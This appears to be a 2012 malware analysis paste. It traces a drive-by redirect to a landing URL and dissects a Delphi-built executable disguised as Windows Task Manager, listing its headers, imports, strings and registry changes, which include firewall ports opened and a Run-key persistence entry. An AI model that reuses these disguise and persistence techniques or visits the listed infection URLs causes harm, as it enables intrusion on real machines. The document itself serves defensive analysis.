[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)


  968. -----------------------------
  969.  
  970. 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
  971. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
  972. 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  973. 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
  974. 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
  975. 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
  976. 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
  977. 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
  978. 0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
  979. 0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
  980.  
  981.  
  982. Bin:
  983. //Pic:
  984.  
  985. // faking windoz app:
  986.  
  987. UninitializedDataSize....: 0
  988. InitializedDataSize......: 23040
  989. ImageVersion.............: 0.0
  990. ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
  991. FileVersionNumber........: 5.0.2137.1
  992. LanguageCode.............: English (U.S.)
  993. FileFlagsMask............: 0x003f
  994. FileDescription..........: Windows TaskManager
  995. CharacterSet.............: Unicode
  996. LinkerVersion............: 2.5
  997. FileOS...................: Windows NT 32-bit
  998. MIMEType.................: application/octet-stream
  999. Subsystem................: Windows GUI
  1000. FileVersion..............: 5.00.2137.1
  1001. TimeStamp................: 2012:10:17 04:29:46+01:00
  1002. FileType.................: Win32 EXE
  1003. PEType...................: PE32
  1004. InternalName.............: taskmgr
  1005. ProductVersion...........: 5.00.2137.1
  1006. SubsystemVersion.........: 4.0
  1007. OSVersion................: 4.0
  1008. OriginalFilename.........: taskmgr.exe
  1009. LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
  1010. MachineType..............: Intel 386 or later, and compatibles
  1011. CompanyName..............: Microsoft Corporation
  1012. CodeSize.................: 108032
  1013. FileSubtype..............: 0
  1014. ProductVersionNumber.....: 5.0.2137.1
  1015. EntryPoint...............: 0x1ef0
  1016. ObjectFileType...........: Executable application
  1017.  
  1018. //Sigcheck
  1019.  
  1020. publisher................: Microsoft Corporation
  1021. product..................: Microsoft(R) Windows (R) 2000 Operating System
  1022. internal name............: taskmgr
  1023. copyright................: Copyright (C) Microsoft Corp. 1991-1999
  1024. original name............: taskmgr.exe
  1025. file version.............: 5.00.2137.1
  1026. description..............: Windows TaskManager
  1027.  
  1028. Section  VirtAddr  VirtSize  RawSize  Entropy  MD5
  1029. .text    4096      107728    108032   7.49     7bb7c23fbff31a0f4dc8c2082f47d453
  1030. .data    114688    13048     12800    1.62     bfd92f96b4b275e9bdc8941a0ac85831
  1031. .rsrc    131072    8368      8704     3.36     210a8ec34d58b64a2531c59aa8344586
  1032. .reloc   143360    516       1024     3.94     1841b4a61bd8a2498e642d7a36c6d596
  1033.  
  1034. Compiled by: Borland Delphi 3.0
  1035. Compile Time: 2012-10-17 12:29:46
  1036. Packed entropy: 7.48782313568
  1037. Name: .text
  1038. Misc: 0x1A4D0
  1039. Misc_PhysicalAddress: 0x1A4D0
  1040. Misc_VirtualSize: 0x1A4D0
  1041. VirtualAddress: 0x1000
  1042. SizeOfRawData: 0x1A600
  1043. PointerToRawData: 0x400
  1044. PointerToRelocations: 0x0
  1045. PointerToLinenumbers: 0x0
  1046. NumberOfRelocations: 0x0
  1047. NumberOfLinenumbers: 0x0
  1048. Characteristics: 0x60000020
  1049.  
  1050.  
  1051. LangID: 040904B0
  1052.  
  1053. LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
  1054. InternalName: taskmgr
  1055. FileVersion: 5.00.2137.1
  1056. CompanyName: Microsoft Corporation
  1057. ProductName: Microsoft(R) Windows (R) 2000 Operating System
  1058. ProductVersion: 5.00.2137.1
  1059. FileDescription: Windows TaskManager
  1060. OriginalFilename: taskmgr.exe
  1061.  
  1062. ------------------
  1063.  
  1064. imported calls DLL
  1065.  
  1066. -------------------
  1067.  
  1068. 0041EA0C GetCPInfo KERNEL32
  1069. 0041EA10 VirtualAlloc KERNEL32
  1070. 0041EA14 LoadLibraryA KERNEL32
  1071. 0041EA18 GetProcAddress KERNEL32
  1072. 0041EA1C GetWindowsDirectoryW KERNEL32
  1073. 0041EA20 lstrcatW KERNEL32
  1074. 0041EA24 CreateFileW KERNEL32
  1075. 0041EA2C LoadIconA USER32
  1076. 0041EA30 CreateIconIndirect USER32
  1077. 0041EA34 GetDlgCtrlID USER32
  1078. 0041EA38 GetScrollPos USER32
  1079. 0041EA3C RegisterDeviceNotificationA USER32
  1080. 0041EA40 DdeEnableCallback USER32
  1081. 0041EA44 DrawStateA USER32
  1082. 0041EA48 MessageBoxIndirectW USER32
  1083. 0041EA4C LoadMenuA USER32
  1084. 0041EA50 GetTabbedTextExtentA USER32
  1085. 0041EA54 UnpackDDElParam USER32
  1086. 0041EA58 DialogBoxIndirectParamW USER32
  1087. 0041EA5C ToAsciiEx USER32
  1088. 0041EA60 IsWindow USER32
  1089. 0041EA64 LoadKeyboardLayoutA USER32
  1090. 0041EA68 GetCursor USER32
  1091. 0041EA6C UserHandleGrantAccess USER32
  1092. 0041EA70 GetMenuState USER32
  1093. 0041EA74 SetMenuItemInfoA USER32
  1094. 0041EA78 TabbedTextOutW USER32
  1095. 0041EA7C mouse_event USER32
  1096. 0041EA80 DdeSetUserHandle USER32
  1097. 0041EA84 SetWindowWord USER32
  1098. 0041EA88 SetDlgItemTextW USER32
  1099. 0041EA8C IsMenu USER32
  1100. 0041EA90 SetWindowTextW USER32
  1101. 0041EA94 GetSystemMenu USER32
  1102. 0041EA98 RegisterClassA USER32
  1103. 0041EA9C ChangeDisplaySettingsExW USER32
  1104. 0041EAA0 SetMenuInfo USER32
  1105. 0041EAA4 GetKeyState USER32
  1106. 0041EAA8 ChildWindowFromPoint USER32
  1107. 0041EAAC LoadCursorFromFileW USER32
  1108. 0041EAB0 SendMessageCallbackA USER32
  1109. 0041EAB4 DdeKeepStringHandle USER32
  1110. 0041EAB8 FlashWindow USER32
  1111. 0041EABC OpenIcon USER32
  1112. 0041EAC0 CreateMenu USER32
  1113. 0041EAC4 FindWindowW USER32
  1114. 0041EAC8 GetIconInfo USER32
  1115. 0041EACC GetWindowInfo USER32
  1116. 0041EAD0 IsCharAlphaNumericA USER32
  1117. 0041EAD4 FrameRect USER32
  1118. 0041EAD8 FlashWindowEx USER32
  1119. 0041EADC SetSysColors USER32
  1120. 0041EAE0 GetCapture USER32
  1121. 0041EAE4 DdeGetLastError USER32
  1122. 0041EAE8 SetWindowsHookA USER32
  1123. 0041EAEC PostThreadMessageA USER32
  1124. 0041EAF0 TranslateMessage USER32
  1125. 0041EAF4 GetDlgItemTextA USER32
  1126. 0041EAF8 GetShellWindow USER32
  1127. 0041EAFC CreateAcceleratorTableW USER32
  1128. 0041EB00 DrawMenuBar USER32
  1129. 0041EB04 DdeDisconnect USER32
  1130. 0041EB08 SetClipboardData USER32
  1131. 0041EB0C CreateDialogParamW USER32
  1132. 0041EB10 ToUnicodeEx USER32
  1133. 0041EB14 CreatePopupMenu USER32
  1134. 0041EB18 IMPQueryIMEA USER32
  1135. 0041EB1C CloseWindowStation USER32
  1136. 0041EB20 GetGuiResources USER32
  1137. 0041EB24 GetPropW USER32
  1138. 0041EB28 SetActiveWindow USER32
  1139. 0041EB2C CharNextExA USER32
  1140. 0041EB30 IsRectEmpty USER32
  1141. 0041EB34 LockSetForegroundWindow USER32
  1142. 0041EB38 SetScrollRange USER32
  1143. 0041EB3C EnumPropsExW USER32
  1144. 0041EB40 PostMessageA USER32
  1145. 0041EB44 GetClassInfoExW USER32
  1146. 0041EB48 UpdateWindow USER32
  1147. 0041EB4C GetFocus USER32
  1148. 0041EB50 GetWindow USER32
  1149. 0041EB54 PaintDesktop USER32
  1150. 0041EB58 GetKeyboardLayout USER32
  1151. 0041EB5C ChangeMenuA USER32
  1152. 0041EB60 GetThreadDesktop USER32
  1153. 0041EB64 CharLowerBuffW USER32
  1154. 0041EB6C RegOpenKeyExW ADVAPI32
  1155.  
  1156.  
  1157. --------------
  1158.  
  1159. stringzzz
  1160.  
  1161. --------------
  1162. .text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
  1163. .data:0041C02C 0000000C C CreateFileW
  1164. .data:0041C038 00000009 C kernel32
  1165. .data:0041EB76 0000000A C GetCPInfo
  1166. .data:0041EB82 0000000D C VirtualAlloc
  1167. .data:0041EB92 0000000D C LoadLibraryA
  1168. .data:0041EBA2 0000000F C GetProcAddress
  1169. .data:0041EBB4 00000015 C GetWindowsDirectoryW
  1170. .data:0041EBCC 00000009 C lstrcatW
  1171. .data:0041EBD8 0000000C C CreateFileW
  1172. .data:0041EBE4 0000000D C KERNEL32.dll
  1173. .data:0041EBF4 0000000A C LoadIconA
  1174. .data:0041EC00 00000013 C CreateIconIndirect
  1175. .data:0041EC16 0000000D C GetDlgCtrlID
  1176. .data:0041EC26 0000000D C GetScrollPos
  1177. .data:0041EC36 0000001C C RegisterDeviceNotificationA
  1178. .data:0041EC54 00000012 C DdeEnableCallback
  1179. .data:0041EC68 0000000B C DrawStateA
  1180. .data:0041EC76 00000014 C MessageBoxIndirectW
  1181. .data:0041EC8C 0000000A C LoadMenuA
  1182. .data:0041EC98 00000015 C GetTabbedTextExtentA
  1183. .data:0041ECB0 00000010 C UnpackDDElParam
  1184. .data:0041ECC2 00000018 C DialogBoxIndirectParamW
  1185. .data:0041ECDC 0000000A C ToAsciiEx
  1186. .data:0041ECE8 00000009 C IsWindow
  1187. .data:0041ECF4 00000014 C LoadKeyboardLayoutA
  1188. .data:0041ED0A 0000000A C GetCursor
  1189. .data:0041ED16 00000016 C UserHandleGrantAccess
  1190. .data:0041ED2E 0000000D C GetMenuState
  1191. .data:0041ED3E 00000011 C SetMenuItemInfoA
  1192. .data:0041ED52 0000000F C TabbedTextOutW
  1193. .data:0041ED64 0000000C C mouse_event
  1194. .data:0041ED72 00000011 C DdeSetUserHandle
  1195. .data:0041ED86 0000000E C SetWindowWord
  1196. .data:0041ED96 00000010 C SetDlgItemTextW
  1197. .data:0041EDA8 00000007 C IsMenu
  1198. .data:0041EDB2 0000000F C SetWindowTextW
  1199. .data:0041EDC4 0000000E C GetSystemMenu
  1200. .data:0041EDD4 0000000F C RegisterClassA
  1201. .data:0041EDE6 00000019 C ChangeDisplaySettingsExW
  1202. .data:0041EE02 0000000C C SetMenuInfo
  1203. .data:0041EE10 0000000C C GetKeyState
  1204. .data:0041EE1E 00000015 C ChildWindowFromPoint
  1205. .data:0041EE36 00000014 C LoadCursorFromFileW
  1206. .data:0041EE4C 00000015 C SendMessageCallbackA
  1207. .data:0041EE64 00000014 C DdeKeepStringHandle
  1208. .data:0041EE7A 0000000C C FlashWindow
  1209. .data:0041EE88 00000009 C OpenIcon
  1210. .data:0041EE94 0000000B C CreateMenu
  1211. .data:0041EEA2 0000000C C FindWindowW
  1212. .data:0041EEB0 0000000C C GetIconInfo
  1213. .data:0041EEBE 0000000E C GetWindowInfo
  1214. .data:0041EECE 00000014 C IsCharAlphaNumericA
  1215. .data:0041EEE4 0000000A C FrameRect
  1216. .data:0041EEF0 0000000E C FlashWindowEx
  1217. .data:0041EF00 0000000D C SetSysColors
  1218. .data:0041EF10 0000000B C GetCapture
  1219. .data:0041EF1E 00000010 C DdeGetLastError
  1220. .data:0041EF30 00000010 C SetWindowsHookA
  1221. .data:0041EF42 00000013 C PostThreadMessageA
  1222. .data:0041EF58 00000011 C TranslateMessage
  1223. .data:0041EF6C 00000010 C GetDlgItemTextA
  1224. .data:0041EF7E 0000000F C GetShellWindow
  1225. .data:0041EF90 00000018 C CreateAcceleratorTableW
  1226. .data:0041EFAA 0000000C C DrawMenuBar
  1227. .data:0041EFB8 0000000E C DdeDisconnect
  1228. .data:0041EFC8 00000011 C SetClipboardData
  1229. .data:0041EFDC 00000013 C CreateDialogParamW
  1230. .data:0041EFF2 0000000C C ToUnicodeEx
  1231. .data:0041F000 00000010 C CreatePopupMenu
  1232. .data:0041F012 0000000D C IMPQueryIMEA
  1233. .data:0041F022 00000013 C CloseWindowStation
  1234. .data:0041F038 00000010 C GetGuiResources
  1235. .data:0041F04A 00000009 C GetPropW
  1236. .data:0041F056 00000010 C SetActiveWindow
  1237. .data:0041F068 0000000C C CharNextExA
  1238. .data:0041F076 0000000C C IsRectEmpty
  1239. .data:0041F084 00000018 C LockSetForegroundWindow
  1240. .data:0041F09E 0000000F C SetScrollRange
  1241. .data:0041F0B0 0000000D C EnumPropsExW
  1242. .data:0041F0C0 0000000D C PostMessageA
  1243. .data:0041F0D0 00000010 C GetClassInfoExW
  1244. .data:0041F0E2 0000000D C UpdateWindow
  1245. .data:0041F0F2 00000009 C GetFocus
  1246. .data:0041F0FE 0000000A C GetWindow
  1247. .data:0041F10A 0000000D C PaintDesktop
  1248. .data:0041F11A 00000012 C GetKeyboardLayout
  1249. .data:0041F12E 0000000C C ChangeMenuA
  1250. .data:0041F13C 00000011 C GetThreadDesktop
  1251. .data:0041F150 0000000F C CharLowerBuffW
  1252. .data:0041F160 0000000B C USER32.dll
  1253. .data:0041F16E 0000000E C RegOpenKeyExW
  1254. .data:0041F17C 0000000D C ADVAPI32.dll
  1378.  
  1379. =====================
  1380. behavior check:
  1381. =====================
  1382. Self-deleting;
  1383. drops the payload 1154656.exe (a copy of itself) and uses a CMD command to execute it,
  1384. see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
  1385.  
  1386. REGISTRY:
  1387.  
  1388. ----------------------------------
  1389. Keys added:26
  1390. ----------------------------------
  1391. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
  1392. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
  1393. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
  1394. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
  1395. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
  1396. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
  1397. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
  1398. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
  1399. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
  1400. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
  1401. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
  1402. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
  1403. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
  1404. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
  1405. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
  1406. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  1407. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  1408. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  1409. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  1410. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
  1411. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
  1412. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
  1413. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
  1414. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
  1415. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
  1416. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
  1417. ----------------------------------
  1418. Values added:112
  1419. ----------------------------------
  1420. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
  1421. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
  1422. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
  1423. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
  1424. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
  1425. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
  1426. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  1427. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
  1428. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
  1429. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
  1430. HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
  1431. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
  1432. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
  1433. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
  1434. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
  1435. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
  1436. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
  1437. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
  1438. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
  1439. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
  1440. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  1441. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
  1442. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
  1443. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
  1444. HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
  1445. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
  1446. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
  1447. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
  1448. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
  1449. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
  1450. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
  1451. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
  1452. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1453. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1454. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
  1455. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
  1456. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
  1457. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
  1458. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
  1459. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
  1460. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
  1461. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
  1462. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
  1463. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
  1464. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
  1465. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
  1466. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
  1467. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
  1468. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
  1469. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
  1470. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
  1471. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
  1472. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
  1473. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
  1474. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
  1475. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
  1476. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
  1477. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
  1478. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  1479. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
  1480. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
  1481. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
  1482. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
